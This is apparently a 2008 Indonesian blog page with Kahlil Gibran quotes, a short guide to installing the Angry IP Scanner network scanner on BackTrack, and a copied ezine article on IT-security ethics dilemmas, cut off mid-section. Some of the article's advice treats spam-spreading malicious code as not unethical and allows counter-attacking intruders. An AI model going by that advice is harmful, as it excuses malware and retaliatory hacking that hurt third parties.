"Jika cinta tidak dapat mengembalikan engkau kepadaku dalam kehidupan ini... pastilah cinta akan menyatukan kita dalam kehidupan yang akan datang" (Kahlil Gibran)

"Setetes airmata menyatukanku dengan mereka yang patah hati; seulas senyum menjadi sebuah tanda kebahagiaanku dalam keberadaan... Aku merasa lebih baik jika aku mati dalam hasrat dan kerinduan... ketimbang jika aku hidup menjemukan dan putus asa" (Kahlil Gibran)

"Apa yang telah kucintai laksana seorang anak kini tak henti-hentinya aku mencintai... Dan, apa yang kucintai kini... akan kucintai sampai akhir hidupku, karena cinta ialah semua yang dapat kucapai... dan tak ada yang akan mencabut diriku dari padanya" (Kahlil Gibran)

"Kemarin aku sendirian di dunia ini, kekasih; dan kesendirianku... sebengis kematian... Kemarin diriku adalah sepatah kata yang tak bersuara..., di dalam pikiran malam. Hari ini... aku menjelma menjadi sebuah nyanyian menyenangkan di atas lidah hari. Dan, ini berlangsung dalam semenit dari sang waktu yang melahirkan sekilasan pandang, sepatah kata, sebuah desakan dan... sekecup ciuman" (Kahlil Gibran)

Install Angry Ip Scanner bag 2 [with *.rpm file]

2008-12-22T19:29:00.000+07:00

Tidak tahu kenapa, UbuntuQ pun aku tinggal n sekarang beralih ke Backtrack..(ya termotifasi aja pengen jadi admin jaringan.. tp hub apa ya sama backtrack..? :D)

ya menurut aku seh. dah banya tool yang tersedia di Backtrack, ya dari pada susah2 cari tool lagi...hehehe( dasar Lamer banget nda gue..?xexexe)

Ok, lanjut..
Pertama kali peke backtrack ane bingung juga, coz aplikasi2 nya blom aku kenal banget dan belom familiar dengan KDE Desktop. Mau cari Tool buat scanning network, apa ya yang harus aku gunakan...?( huuufff lamer lamer lamer n lameer.. heheh)

Tanpa pikir panjang langsung aja terpikirkan Tool ini, dolonlot dah...( donlut maksudnya hehe)

Untuk langkah2 nya..
Masuk Console di Backtrack..

bt ~ #

Kemudian masuk direktori file yang mau di Install

bt ~ # cd /root <-- contoh.. langkah selanjutnya ikutin ajah..oke bro..

bt ~ # rpm -i ipscan-3.0_beta3-1.i386.rpm --nodeps
bt ~ #

bila sukses maka instalasi tidak ada error nya...
Apasih perintah2 diatas..?
Ok aku kasih penjelasan dikit yang mungkin dapat memberi gambaran..

> rpm #Merupakan standar aplikasi untuk instasali paket2 RPM biasanya di Desktop KDE
> -i #Perintah untuk Instalasi. Untuk lebih jelasnya pake perintah rpm --help
> ipscan-3.0_beta3-1.i386.rpm #Saya yakin pasti udah ngerti..heheh
> --nodeps #Instalasi tanpa depedensi..

untuk Info lebih lengkap coba aja pergi ke
http://www.tuxfiles.org/linuxhelp/rpminstall.html

sekian dulu yap tips dari saya.. semoga mampu membantu kawan-kawan sekalian

salam
fitri ariyanto [ mas lamer...hehehe ]

Dilema Etika IT Security Professional

2008-12-05T10:18:00.000+07:00

Artikel ini di-copy dari ezine Echo.or.id.
Berikut penjelasan.

-- -- -( Foreword )
Apa yang yang harus dilakukan oleh para professional di bidang keamanan jaringan komputer apabila mereka menghadapi beberapa masalah terutama yang menyangkut dengan nilai etis dari pekerjaan mereka? Saya akan mencoba membahas beberapa hal yang mungkin terjadi dan bahkan sedang anda alami saat ini dengan mencoba memberi solusi dari 2 sudut pandang yang berbeda.

Terkadang kita untuk menyelesaikan suatu masalah yang terjadi pada pekerjaan harus terbentur dengan nilai etis dari profesi kita sendiri yang membuat kita menghadapi suatu dilema, disatu sisi kita mau pekerjaan kita cepat selesai sedangkan dilain sisi kita harus mempertimbangkan nilai etis tersebut dalam menyelesaikannya. Anda bisa saja "kejam" untuk dapat segera menyelesaikannya atau anda bisa menggunakan "perasaan" untuk mencari solusi yang terbaik. Semuanya tergantung anda untuk memilih mana yang terbaik untuk anda.

-- -- -( Hacking )

Hacking sebuah komputer adalah bentuk dari serangan yang dilakukan oleh seseorang yang dikenal sebagai "hacker" untuk mencoba masuk/menyusupi kedalam sebuah system komputer yang tidak dimiliki nya. Termasuk didalamnya adalah "melewati" mekanisme yang sudah dibangun dari sebuah system atau jaringan dengan tujuan untuk mengambil data yang tersedia dan juga "resources" yang dimiliki oleh system tersebut.

Pada bagian ini kita akan berhadapan dengan dilema yang akan dihadapi apabila anda adalah seorang yang bertanggung jawab akan keamanan dan kelangsungan jaringan komputer tersebut dengan harus harus melakukan "perlawan" terhadap para "penyusup" tersebut. Kita akan bersinggungan dnegan dimana situasi yang memungkinkan untuk mencoba menyusup kedalam system yang tujuannya untuk keperluan bisnis atau edukasi (proof-of-concept). Kita juga akan mencoba mendiskusikan beberapa type dari metode "hacking" yang saling berhubungan satu dnegan yang lain. Ini meliputi masalah pada serangan terhadap system operasi (OS), membongkar "password" dan "spoofing".

--| Hacking for Business Warfare - apakah ini juga termasuk bagian dari bisnis?

Pimpinan anda memberi pernyataan bahwa dia berpikir situs saingan perusahaan anda dapat ditebak "URL"-nya (Uniform Resource Locator) dan menunjukkan kepada anda beberapa contoh. Dia lalu bertanya kepada anda apakah anda mampu mendapatkan informasi yang lebih banyak dari situs saingan perusahaan anda. Apakah anda akan melakukan "hacking" untuk pimpinan anda sehingga dapat bersaing atau sebuah keterpaksaan untuk dapat mempertahankan pekerjaan anda ?

Konservatif: melakukan "hacking" terhadap situs saingan perusahaan adalah suatu sikap yang tidak dapat diterima. Aksi ini sudah menjurus kepada perbuatan yang melanggar hukum. Beritahu kepada pimpinan anda bahwa anda tidak mau untuk melakukan "hacking" terhadap situs saingan perusahaan anda untuk alasan apapun.

Liberal: bisnis adalah perang dan memanfaatkan teknologi yang ada untuk dapat berhasil atau mampu bersaing adalah hal yang wajar-wajar saja. Bila anda tetap berpegang pada hukum teknologi informasi (IT), anda tidak melakukan sesuatu yang salah. Anda dapat dengan yakin bahwa saingan perusahaan anda juga melakukan hal yang sama pada perusahaan tempat anda bekerja.

saran
-------------------

Ketika pejabat senior meminta untuk melakukan tindakan ilegal tersebut, jangan langsung dikerjakan. Selalu pertimbangkan hasil atau akibat yang akan ditimbulkan apabila anda melakukannya dan tetap berpegang teguh pada prinsip kerja anda. Jangan menempatkan diri anda atau perusahaan anda dalam bahaya atau "membunuh" nilai etis untuk bisa tetap bekerja ditempat anda.

---------------------| Giving in to Distributed Denial of Service "Hacktortionist" – apakah anda membayarnya?

Seorang hacker menghubungi "Chief Executive Officer" (CEO) dari perusahaan anda dan meminta untuk melakukan pembayaran dengan jumlah yang lumayan besar atau dia aakan melakukan penghancuran total terhadap jaringan system komputasi diperusahaan anda bekerja. Jika perusahaan anda tidak membayar, maka "hacker" tersebut akan melakukan serangan "Distributed Denial of Service" (DDoS). Serangan ini akan membuat kerugian yang jauh lebih besar daripada perusahaan anda memberikan jumlah uang yang diminta oleh "hacktortionist" tersebut jika berhasil. CEO perusahaan anda menanyakan kepada anda, sebagai orang yang bertanggung jawab atas kelangsungan system komputasi beserta jaringan diperusahaan anda, apa yang akan anda rekomendasikan untuk merespon ancaman tersebut. Apa yang akan anda katakan kepadanya ?

Konservatif: sebagai orang yang bertanggung jawab atas kelangsungan system dan jaringannya diperusahaan anda. Sebuah serangan DDoS akan membuat system menjadi "down" dan biaya yang dikeluarkan dari permintaan si "hacktortionist" jauh lebih besar. Kemungkinan besar kerusakan pada "peripheral" juga terjadi sewaktu dalam proses DDoS. Walaupun ini kedengaran tidak etis, sarankan kepada CEO untuk membayar permintaan si "hacker" dan segera hubungi pihak yang berwenang untuk melacak keberadaan mereka untuk diproses secara hukum.

Liberal: jangan dibayar !!. Orang yang mengaku-ngaku (copycat) dari "hacker" yang mempunyai "nama besar" akan terus mencoba untuk mengambil keuntungan dari perbuatan "hacker" yang pertama. Berhubung anda telah diperingatkan oleh "hacker" tersebut, segera saja amankan system dan minta bantuan tambahan untuk proses penyelamatan system dan juga untuk melacak dan mengejar si "hacker" tersebut. Segera laporkan ancaman ini kepada pihak yang berwajib.

saran

-------------------

Perusahaan menyerah kepada "hacktortionist" dikarenakan 2 alasan utama. Alasan pertama, biaya untuk perbaikan system dan jaringan dari proses DDoS jauh lebih lebih besar daripada yang harus dibayar kepada si "hacktortionist" tersebut. Alasan kedua, reputasi bisnis perusahaan anda akan hancur didepan media massa apabila hasil dari serangan tersebut disampaikan kepada publik. Ini terutama menyangkut data pribadi yang disimpan oleh perusahaan seperti data kartu kredit atau hal yang bersifat pribadi untuk klien perusahaan.

-------------------

--| Hacking for Education - apakah ini benar hanya untuk pendidikan ?

Untuk beberapa "hacker", "hacking" adalah proses pembelajaran. Ini tentang mempelajari system operasi (OS) dan kelemahannya, bukan untuk mencari ketenaran untuk mereka atau melakukan aktifitas penghancuran seperti "Egomaniac Hackers" yang ingin dikenali nama alias mereka di media massa. Apakah tipe "hacking" ini dapat diterima daripada "hacker" yang ingin menjadi terkenal ??

Konservatif: tidak ada bentuk dari aktifitas hacking yang dapat diterima. Masuk kedalam rumah seseorang untuk menguji keahlian membuka jendela atau pintu anda dan melihat seberapa cepat atau "halus" anda melakukannya. Ini juga sama dengan "hacking". Motif tidak dapat dijadikan alasan untuk melakukannya.

Liberal: pada dasarnya "hacking" untuk pendidikan tidak dapat diterima. Tapi bagaimanapun juga, jika anda tidak mempunyai tujuan negatif ini secara etis dapat dimaafkan dari pada seseorang dengan tujuan yang jelek. Bahkan jika anda melaporkan celah keamanan yang anda dapatkan untuk dapat masuk kedalam system perusahaan itu, tetap saja perbuatan itu tidak benar secara etis.

saran

-------------------

Tidak ada pembenaran secara etis untuk melakukan "hacking" terhadap system orang/perusahaan lain. Hanya organisasi yang dipercaya yang dapat mengijinkan pegawai mereka untuk melakukan "hacking" terhadap system di pemerintahan maupun militer untuk kepentingan keamanan nasional. Didalam kasus ini, aksi yang anda lakukan mungkin terhormat. Didalam kasus lain, jauhi aktifitas "hacking" kecuali anda diberi wewenang untuk melakukan "penetration test" terhadap perusahaan anda sendiri.

-------------------

--| OS Attacks - pelacakan terhadap penyusup ?

Hacker dan pembuat worm sering kali membuat serangan terhadap system operasi (OS) Microsoft dikarenakan banyak hacker tidak simpati terhadap policy Microsoft. Apakah benar untuk menyerang sebuah perusahaan dikarenakan mereka mempunyai reputasi buruk di industri atau relasi mereka atau konsumen melihat mereka bersikap tidak etis?

Konservatif: hacking terhadap sesuatu sangatlah tidak etis tergantung pada perasaan yang membuat anda menyerang suatu perusahaan. Anda akan berhenti untuk berusaha "menghukum" perusahaan yang anda tidak sukai.

Liberal: bisnis adalah perang dan kadangkala untuk menyeimbangkan permainan dengan perusahaan yang tidak disenangi maka kita harus memainkan permainan itu juga. Bagaimanapun juga, anda perlu mempertimbangkan orang lain yang akan merasakan "efek"nya selain dari perusahaan tersebut. Hacking juga berefek terhadap pengguna dari perangkat lunak dan kemungkinan besar akan berakibat negatif terhadap mereka.

saran

-------------------

"Kerajaan" dari perangkat lunak microsoft sangatlah besar yang menyebabkan banyak hacker berusaha untuk menyerang atau mencari celah untuk menghancurkan mereka. Walaupun usaha hacking terhadap system komputasi perusahaan lain merupakan tindakan yang tidak etis (tidak simpatik), beberapa diantaranya akan mendapat penghormatan apabila mereka menyerang perusahaan yang tidak simpatik. Anda harus memutuskan mana yang terbaik untuk anda sendiri (which side you are standing against?).

-------------------

--| Cracking Screen Saver Password - haruskan atau tidak boleh ?

Anda harus melakukan patching terhadap sebuah komputer di jaringan komputer internal perusahaan anda dan mereka sedang keluar untuk makan siang, mereka menggunakan password pada screen saver mereka yang sangatlah mudah untuk anda "jebol". Apakah anda melakukannya ?

Konservatif: hindari menjebol password pada screen saver orang lain dan tunggu saja mereka kembali setelah jam makan siang usai. Ini akan memberi contoh yang buruk terhadap pengguna. Walaupun anda adalah orang yang bertanggung jawab untuk jaringan komputer internal perusahaan anda, yang lain mungkin mempunyai cukup pengetahuan dan akses yang seperti anda akan mencoba melakukan seperti yang anda lakukan saat ini.

Liberal: Menjebol password di screen saver bukan suatu masalah besar, cukup masuk kedalam system dan segera selesaikan apa yang akan anda selesaikan. Ini sering terjadi, sering kali anda harus melakukan proses update setelah jam kerja, mau tidak mau anda harus melakukannya juga. Karyawan yang lain harus memahami ini adalah bagian dari tugas anda.

saran

-------------------

Sebagai orang yang bertanggung jawab akan kelangsungan jaringan komputer internal di perusahaan anda, anda harus dapat memberi suatu contoh yang bagus untuk ditiru. Dalam banyak kasus, sangat bijak jika anda memberi contoh yang bagus dikarenakan anda tidak menjebol password orang lain. Bagaimanapun juga, ketika anda harus menyelesaikan pekerjaan anda, anda harus melakukannya saat itu juga.

-------------------

--| Spoofing - apakah ini mempunyai tujuan ?

Spoofing terhadap IP sering kali terjadi didalam system yang aman oleh super hackers yang mempunyai tujuan tidak untuk merusak system tersebut. Mereka hanya mencoba untuk menjadi "security zen". Apakah tipe spoofing seperti ini dapat diterima dikarenakan mereka tidak berencana untuk merusak system yang anda dan bahkan menunjukkan kelemahan system yang ada pada anda supaya anda dapat segera memperbaikinya?

Konservatif: Spoofing dalam segala bentuk adalah aktifitas tidak dapat ditoleransi. Bahkan jika tidak untuk merusak. Ini bukan tempat anda untuk menunjukkan dimana celah keamanan didalam system orang lain. Terlebih lagi jika untuk dikenali sebagai seorang "security zen".

Liberal: Ada sesuatu yang baik tentang spoofing untuk dikenali sebagai "security zen". Tipe aktifitas ini akan membantu para pengembang untuk mengenali secara dini kelemahan keamanan system. Selama tidak terjadi kerusakan, ini akan mencegah kemungkinan terjadinya kerusakan pada masa yang akan datang.

saran

-------------------

Para "zen" senang untuk dapat lebih pintar dari sesama "zen", ini adalah suatu permainan bagi mereka. Terkadang permainan ini dapat menolong mengenali kelemahan system terhadap system perusahaan yang mereka pegang. Aktifitas ini juga terkadang mengkonsumsi terlalu banyak sumber daya dan energi yang ada, yang dimana pada titik paling buruk, akan menyebabkan kerusakan secara tidak disengaja.

-------------------

-- -- -( Penetration Test )-

"Penetration testings" secara etis adalah proses hacking yang legal dan melakukan "probing" terhadap suatu system informasi perusahaan dan jaringannya untuk meliha apakah terdapat potensi terhadap kelemahan keamanan atau celah keamanan yang dapat di eksploitasi oleh "penyusup". Metode "penetration testing" melibatkan sebuah investigasi di semua fitur keamanan dari sebuah system. "Penetration tester" akan mencoba untuk mengelabui keamanan dari mencoba untuk memasuki system dan jairngan. Tester akan mensimulasikan seorang hacker dengan menggunakan cara menyerang, metode dan alat yang sama dengan untuk sebuah simulasi serangan nyata. Setelah selesai, penetration tester akan membuat sebuah laporan akan celah keamanan dan menyarankan prosedur untuk implementasi agar dapat membuat system menjadi lebih aman.

--| Testing Security Vulnerability - bersediakah anda membantu ?

Seorang karyawan di departemen IT mau melakukan pengecekan terhadap tingkat celah keamanan komputasi perusah. Didalam proses, dia mendapatkan celah keamanan yang cukup besar. Dia tidak mau untuk mendapat masalah dikarenakan aktifitas "hacking" terhadap system komputasi perusahaan, maka dia membuat "malicious script" dengan tujuan agar orang yang bertanggung jawab atas system komputasi perusahaan segera menyadari bahwa terdapat celah keamanan. Apakah sikap seperti ini dapat dianggap etis?

Konservatif: melakukan pengecekan terhadap keamanan system tanpa izin sangatlah tidak dapat ditoleransi. Membuat "malicious script" untuk menunjukkan celah keamanan adalah sesuatu yang gila. Dia tidak hanya membahayakan perusahaan tetapi juga tidak bersedia untuk memberitahu kepada yang bertanggung jawab akan apa yang telah ditemukannya. Ini dapat berdampak pada prospek karir dia dan masa depan perusahaan.

Liberal: walaupun melakukan sebuah pengecekan system tanpa disertai izin telah menyalahi aturan perusahaan, tapi dalam kasus ini itu sangat informatif dan menjukkan inisiatif. Dia harus berhenti pada poin itu dan mempresentasikan hasil temuannya kepada yang bertanggung jawab. Dia telah menyalahi aturan dikarenakan membuat "malicious script" untuk menunjukkan akan celah keamanan yang ada.

saran

-------------------

Berusaha membantu staff yang bertanggung jawab untuk menemukan kelemahan pada system perusahaan dapat menimbulkan bahaya yang lebih besar dari pada untuk pencegahannya. Sangat dianjurkan untuk menghindari membantu staff yang bertanggung jawab. Dikarenakan mereka adalah ahli dan anda bukan. Jika anda menemukan celah keamanan, segera laporkan kepada staff yang bertanggung jawab. Jangan pernah eksekusi "malicious script" terhadap perusahaan anda sendiri dengan alasan apapun, walaupun tujuan anda adalah baik.

-------------------

Don't Be Affraid to Attack Your Own Network (or Products).

As a security professional, you should encourage the security analysis of hardware and software technologies that you use on your network or in your organization. Of course, it must be clearly defined that such activities should only take place on test and development systems and products, not live network components.

Set up test networks and product configurations in your laboratory and allow employees to look for security vulnerabilities. Reward them for their success. It will strengthen the security of the organization and at the same time foster creativity, education, open-mindedness, and competitive spirit.

Incorporating third-party security audits of your network configuration or product development lifecycle can also help to discover previously overlooked vulnerabilities. Having a fresh set of eyes can go a long way. Its frustrating, but typical, to watch corporations introduce new technologies onto their live network without testing them. They don’t understand exactly what threats they are protecting against and why. Do not be afraid to explore. Try to break your product, software, or networktheres no harm in that. Fix the problems and try again. Be proactive. Dont wait for a malicious attacker to find the problems for you.

-- Joe Grand

President & CEO

Grand Idea Studio, Inc.

--| Appropriate Hacking to Determine Weakness - mengerti apa yang anda lakukan

Anda baru saja menyelesaikan sebuah training tentang hacking, melatih kemampuan dengan materi training yang baru saja anda selesaikan, anda memulai untuk mencoba "memasuki" keamanan system komputasi perusahaan anda untuk melihat apakah terdapat celah keamanan. Apakah tindakan ini dapat diterima jika anda adalah staff yang bertanggung jawab atas keamanan komputasi dan jaringan komputasi perusahaan anda ?

Konservatif: walaupun tujuan anda adalah untuk melakukan pengecekan terhadap integritas dari system, yang dimana ada didalam pengawasan anda, hacking dapat membuat kerusakan. Sejak anda anda hanya mengambil training, anda mungkin saja belum memenuhi standard untuk dapat melakukan sebuah pengecekan celah keamanan tanpa harus menyebabkan kerusakan yang tidak perlu pada system yang seharusnya anda lindungi. Jika anda ingin melakukannya, sewalah seorang konsultan yang mempunyai pengalaman dan mampu untuk melakukannya.

Liberal: sebagian dari tugas anda sebagai staff yang bertanggung jawab atas keamanan system komputasi dan jaringan komputasi perusahaan anda adalah melakukan pengecekan celah keamanan dari system yang anda lindungi. Mulailah dengan pengecekan yang mudah yang anda tahu "recovery" nya apabila terjadi sesuatu yang tdiak diinginkan. Lalu mulailah dengan perlahan dari situ sehingga anda mampu untuk melakukan pengecekan celah keamanan yang sesungguhnya.

saran

-------------------

Melakukan pengecekan keamanan system yang dimana anda bertanggung jawab untuk melindunginya adalah sebuah pekerjaan yang menantang. Pastikan anda tahu dengan pasti apa yang anda lakukan ketika melakukan hacking terhadap system. Jika anda adalah pemula, mulailah dengan perlahan atau biarkan pekerjaan itu kepada orang yang mampu melakukannya tanpa menempatkan system itu sendiri kedalam bahaya. Bila anda merasa pengetahuan anda sudah cukup, lakukan beberapa test dasar pada lab. Komputasi perusahaan anda dan bukan terhadap system perusahaan anda yang sedang berjalan.

-------------------

--| Failure of Penetration testing Software - salah siapa ?

Perangkat lunak yang anda beli untuk melakukan sebuah pengecekan celah keamanan dari system anda kelihatannya berhasil sampai sebuah serangan membuat system komputasi perusahaan anda menjadi tidak berfungsi. Produk ini tidak dapat mencari kelemahan dari yang dilancarkan oleh "penyusup". Apakah ini salah dari vendor ataukah salah dari sumber daya manusianya sendiri untuk melakukan pengecekan keamanan system.

Konservatif: anda harus melakukan minimal dua tipe pengecekan keamanan system untuk dapat memastikan integritas dari system tersebut. Latihan yang paling baik adalah melakukannya dengan orang yang mampu melakukannya dengan baik (professional) juga dengan menggunakan aplikasi yang dibuat khusus untuk melakukan test penetrasi.

Liberal: mintalah kembali uang anda ditempat anda membeli aplikasi tersebut. Itu sudah sangat jelas bahwa aplikasi itu tidak melakukan tugasnya dengan baik. Sekarang anda harus memulai semuanya dari awal lagi dan belilah sebuah aplikasi atau menyewa jasa dari orang yang mempunyai pekerjaan sebagai "specialized security professional" untuk melakukan test penetrasi tersebut.

saran

-------------------

Percaya sepenuhnya terhadap satu aplikasi adalah sebuah resep menuju bencana. Tidak semua aplikasi dapat memenuhi standard tersebut. Pastikan anda telah melakukan penelitian sebelum membelinya. Jangan letakkan keamanan system anda ditangan para marketing. Ambillah beberapa waktu dan cobalah untuk bertanya, melihat referensi dan benar-benar tahu apa yang anda beli sehingga anda dapat mempunyai asumsi bahwa ini adalah solusi yang efektif untuk keperluan keamanan informasi yang dibutuhkan perusahaan anda. Akan selalu baik jika anda menggabungkan penggunakaan aplikasi dan sumber daya manusia, terutama didalam kasus test penetrasi.

-------------------

-- -- -( Viruses and Worms )-

Virus dan "worms" adalah perwujudan dari "compiled malicious script" yang dirancang untuk membuat system tidak berdaya atau bahkan menghancurkannya. Ada banyak tipe dari virus dan "worms" itu sendiri. Programmer membuat satu jenisnya setiap hari. Beberapa, sebagai contoh "Code Red", sangat brutal. Sedangkan yang lain mungkin hanya sekedar "penggembira". Spam juga merupakan sebuah bentuk dari "malicious action" yang dimana berkembang sangat cepat dikarenakan potensi marketing yang didapatkan.

--| Virus Development for Profit - apakah ini dapat diterima ?

Pembuat worm dan virus mengambil keuntungan dari "compiled malicious code" mereka melalui spam, beberapa ahli mengatakan bahwa ada hubungan antara para pembuat virus tersebut dengan spammer. Apakah secara etis dapat ditolerir untuk mendapatkan keuntungan dengan membuat "compiled malicious script" untuk pendistribusian spam?

Konservatif: pengembangan spam atau semacam virus untuk keuntungan dari sesuatu yang jelas sekali salah. Dan itu juga ilegal dan seharusnya tidak dapat ditoleransi dalam keadaan apapun juga.

Liberal: membuat virus untuk kepentingan marketing seperti spam merusak reputasi programmer tersebut; bagaimanapun juga, tindakan itu tidak etis. Terdapat beberapa aturan hukum dibeberapa negara untuk mengatur e-mail yang tidak diinginkan, jika programmer "spam" mengikuti aturan hukum yang berlaku, maka tindakan mereka tidak dapat dilarang tapi juga dapat diterima.

saran

-------------------

Membuat "malicious code" yang membuat spam memenuhi kotak e-mail bukanlah suatu pekerjaan yang membanggakan, tapi tidak juga melanggar nilai etis, kecuali itu dapat menyebabkan kerusakan terhadap system penerimanya. Bagaimapun juga, kita hidup dengan sales yang mendatangi rumah ke rumah untuk menawarkan produk mereka dan itu juga termasuk spam. Hukum juga bervariasi dibeberapa negara, sehingga spam mungkin suatu hal yang dapat diterima didalam keperluan bisnis, dan tidak seorangpun mempunyai hak untuk menghentikannya.

-------------------

--| System Chrashes - haruskah anda melakukan format kembali terhadap Hard Drive?

Sebuah virus membuat komputer menjadi tidak berfungsi pada ruangan salah seorang pejabat senior di kantor anda dan mereka memberitahu bahwa anda dapat melakukan apa saja untuk membuat komputer itu kembali bisa digunakan. Kerusakan itu jelas dan tidak ada yang dapat anda lakukan untuk memperbaikinya pada saat itu. Anda tidak dapat melakukan "backup"" sehingga anda tidak mempunyai pilihan lain lagi selain melakukan format kembali hard drive-nya. Ketika pejabat senior itu kembali, mereka menyalahkan anda dan berkata bahwa anda tidak berhak untuk menghapus semua data yang ada didalam hard drive tersebut dan akan berusaha membuat anda untuk dipecat. Apakah ini kesalahan anda?

Konservatif: ketika melakukan format kembali sebuah "hard drive" untuk seorang pejabat senior atau siapapun juga untuk alasan apapun juga, anda seharusnya menunggu mereka untuk kembali sehingga anda bisa menjelaskan apa yang terjadi dan tidak berakhir menjadi "kambing hitam". Sejak system di komputer itu benar-benar tidak dapat berfungsi lagi, tidak ada yang dapat anda lakukan untuk merubahnya. Bagaimanapun juga anda tetap salah dikarenakan telah melakukan format kembali hard drive tersebut tanpa melakukan konsultasi terlebih dahulu dengan pejabat senior tersebut. Walaupun kegagalan system bukan kesalahan anda, tetapi anda telah menempatkan diri untuk menjadi seorang "kambing hitam".

Liberal: anda bukanlah orang yang patut disalahkan. Pejabat senior itu tentu akan membuat anda dipecat. Dia mempunyai "kuasa" untuk melakukannya, mungkin saja dia tidak dapat mengerti apa yang terjadi secara teknis. Dan tetap saja anda akan disalahkan walaupun anda tidak melakukan suatu kesalahan.

saran

-------------------

Mengantisipasi kesalahan adalah sesuatu yang rumit ketika itu berhubungan dengan teknologi. Sangat sedikit orang yang mengerti dari kerumitan teknologi dan bagaimana seorang "penyerang" dapat "mempengaruhi" komputer. Bila anda berusaha untuk menjelaskan keadaan ini sejak mereka memang tidak mengertinya, mereka mungkin tidak dapat memahami apa yang terjadi maka mereka akan berasumsi bahwa anda telah bertindak ceroboh. Sejak anda yang membuat kesalahan dengan melakukan format kembali tanpa konsultasi terlebih dahulu maka anda sendiri yang membuat diri anda berada dalam bahaya. Pejabat senior membuat banyak kesalahan; "mengambil" virus itu dan menyalahkan anda.

Bila anda masih tetap bekerja dikantor itu, buatlah prosedur yang formal pada form pengunduran diri ketika anda harus melakukan format kembali hard drive seseorang. Pada masa yang akan datang ini akan membantu anda untuk menghindari konsekuensi yang buruk.

-------------------

--| Attacking Attackers - haruskah anda melakukan penyerangan ?

Anda menemukan dan berhasil mengidentifikasikan seseorang yang telah melakukan hacking terhadap system anda. Apakah benar bahwa anda harus memberi mereka "pelajaran" dan melakukan hacking terhadap mereka, atau mengirimkan mereka virus yang sangat brutal?

Konservatif: sangatlah tidak benar untuk menggunakan "kekerasan" untuk membalas pada seseorang yang menyerang system anda. Ini hanya akan berakibat pada saling serang yang tidak akan pernah berakhir. Hubungi mereka di telepon atau hampiri mereka dan coba untk menangani keadaan ini dengan cara yang benar, yang dimana tidak akan berakibat serangan lanjutan pada system dimana anda bertanggung jawab atasnya. Dokumentasikan semua penemuan anda jika dalam suatu kasus anda akan melanjutkan ke pengadilan untuk memproses secara hukum kasus tersebut.

Liberal: terkadang satu-satunya cara agar "hacker" bisa mengerti keadaan ini, berikan mereka sebuah "pukulan" telah dengan sebuah virus yang sangat merusak dan berusaha untuk menghancurkan system mereka. Maka, dia tidakakan dapat lagi menyerang anda.

saran

-------------------

Seorang staff IT dapat menggunakan banyak taktik ketika harus berhadapan dengan penyusupan keamanan. Dalam banyak kasus, bertindak menyerang bukan merupakan suatu ide yang bagus karena anda kemungkinan akan mendapatkan masalah lain. Bagaimanapun juga, mungkin dalam beberapa pertimbangan penyerangan merupakan satu-satunya pilihan yang ada

-------------------

--| Bypassing Alerts - bukan suatu ide yang bagus.

Perangkat lunak yang anda gunakan untuk melihat integritas dan keamanan dari system yang membuat terlalu banyak peringatan, sehingga anda dengan segera melihat laporannya setiap hari dan berusaha menangani apakah itu peringatan yang benar atau salah. Jika itu memang peringatan yang benar dan sebuah virus menyerang system. Apakah anda anda salah dikarenakan tidak melakukan pengecekan dengan teliti, ataukah perusahaan perangkat lunak yang anda gunakan membuat terlalu banyak kesalahan sehingga sangatlah sulit untuk anda menentukan mana peringatan yang salah dan mana peringatan yang benar?

Konservatif: anda memang salah pada keadaan ini, walaupun peringatan itu kadang bersifat acak, dengan hanya melihat mereka semuanya sangatlah sia-sia dikarenakan anda tidak memperhatikan dengan teliti dan mengasumsikan bahwa mereka tidak tentu. Beberapa peringatan akan menjadi peringatan yang salah. Sudah merupakan kewajiban anda untuk melakukan pengecekan dengan teliti untuk mengantisipasi peringatan mana yang harus direspon dan mana yang harus tidak diperhatikan. Anda secara dasar telah salah dikarenakan tidak memperdulikannya dan sewaktu virus datang menyerang maka sudah pasti itu kesalahan anda.

Liberal: anda tidak salah, tetapi perusahaan perangkat lunak tersebut yang salah. Membuat suatu produk yang sulit dan tidak menentu untuk digunakan sangatlah tidak menolong dalam mengamankan suatu system. Peringatan seharusnya lebih terfokus dan tidak secara umum dan dapat membantu staff untuk melakukan pekerjaan mereka dan bukan mempersulitnya.

saran

-------------------

Kasus diatas merupakan suatu dilema, keduanya (vendor dan staff) salah. Vendor salah dikarenakan alat mereka tidak dapat mengantisipasi secara pasti dan terlalu umum, sedangkan staff salah dikarenakan mereka sangatlah malas.

-------------------

-- -- -( Encryption )-

Enkripsi adalah proses dari enkoding atau pengacakan data teks yang membuatnya susah buat seseorang untuk melihat isi asli dari data tersebut ketika dikirimkan dengan pengecualian penerima yang sebenarnya, sebuah algoritma enkripsi secara rumit menggunakan level dari proteksi yang disediakan oleh enkripsi. Enkripsi melindungi email, mengamankan transaksi "on-line", situs "File Transfer Protocol" (FTP), dan banyak lagi.

--| Sending Unencrypted Documents - haruskah itu terjadi ?

Anda mengerti bahwa itu melanggar peraturan perusahaan untuk mengirim dokumen rahasia yang tidak di enkripsi terleih dahulu keluar dari jaringan perusahaan. Bagaimanapun juga, anda dibawah "deadline" yang ketat dan memerlukan dengan segera mengirimkan dokumen tersebut kepada asisten anda yang dimana bekerja dirumah anda. Ini mungkin bukan suatu masalah yang besar, benarkan?

Konservatif: anda seharusnya dengan alasan apapun juga mengirimkan dokumen yang tidak dienkripsi terlebih dahulu keluar dari jaringan perusahaan. Anda salah pada poin ini. Anda tentunya tidak menunjukkan contoh yang bagus pada perusahaan akan nilai etis dari "secure code & secure environment".

Liberal: kasus ini mungkin berlaku untuk orang yang belum paham benar dengan "secure code & secure environment" tapi itu tidak berlaku untuk anda yang bertanggung jawab akan kerahasiaan pengiriman data perusahaan.

saran

-------------------

anda mungkin menyaksikan pegawai lain membuat kesalahan ini tapi itu bukan suatu toleransi untuk staff IT seperti anda.

-------------------

--| Victim of Industrial Espionage - tanggung jawab siapa ?

Seorang kompetitor berhasil "menyadap" sebuah "e-mail" antara "CEO" perusahaan anda dan mitra kerja perusahaan anda, yang dimana memuat informasi yang sangat rahasia. "CEO" gagal untuk melakukan enkripsi walaupun tersedia aplikasi enkripsi di komputernya. Apakah ini salah anda?

Konservatif: jika "CEO" tidak melakukan enkripsi pada "e-mail" yang memuat data rahasia, anda tidak melakukan pekerjaan anda dengan benar sebagai pemahaman akan keamanan data maka semua kesalahan akan dialamatkan kepada anda . Tugas dari staff yang bertanggung jawab adalah mengamankan data perusahaan dan system beserta jaringannya. Ini termasuk mengajarkan dan melatih pegawai dan pejabat akan apa yang harus mereka lakukan untuk memastikan akan privasi dan keamanan.

